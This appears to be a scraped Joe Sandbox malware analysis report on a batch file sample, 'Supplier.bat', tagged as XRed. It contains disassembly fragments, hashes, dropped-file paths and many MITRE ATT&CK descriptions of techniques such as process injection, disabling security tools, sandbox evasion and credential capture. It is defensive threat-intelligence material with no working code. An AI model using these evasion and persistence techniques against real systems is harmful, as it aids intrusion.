Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 5a188d9f03b0bd0686ae522ce49d5fe1da4a3c913d7fc845b2f1a21db738fe3f
Instruction ID: c2dd7fed5251868206933388ff7ea6b4ca77655ec18ce1e454df1e4880cacdc0
Opcode Fuzzy Hash: 5a188d9f03b0bd0686ae522ce49d5fe1da4a3c913d7fc845b2f1a21db738fe3f
Instruction Fuzzy Hash: E3D0237134431077D77063709C0FFD76604DB14B00F014819730D561C0C9E4BC00C614

Function 006DD009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 006DD01E
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 006DD035

Strings

aut, xrefs: 006DD02F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 37edaf3598e483130d24282e0deec38d0f5f7c9d5bf2f9b3ca608036ed0aaf76
Instruction ID: 54a91ca55281260f9e77a9a04598c4c5d2c880d167fda4a6c1c58f5f27360d44
Opcode Fuzzy Hash: 37edaf3598e483130d24282e0deec38d0f5f7c9d5bf2f9b3ca608036ed0aaf76
Instruction Fuzzy Hash: 09D05EB554030EBBDB20ABA4ED0EF99776CA704709F1081907624D10D1D3F8EA458FA4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Supplier.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: XRed

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_e73781c637c020daee3de6ae263d2d0a91f2a4c_455b7b6e_efe97e45-91f3-4457-ab4b-54f0be721b13\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6480.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER71CF.tmp.WERInternalMetadata.xml

Windows Analysis Report
Supplier.bat

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre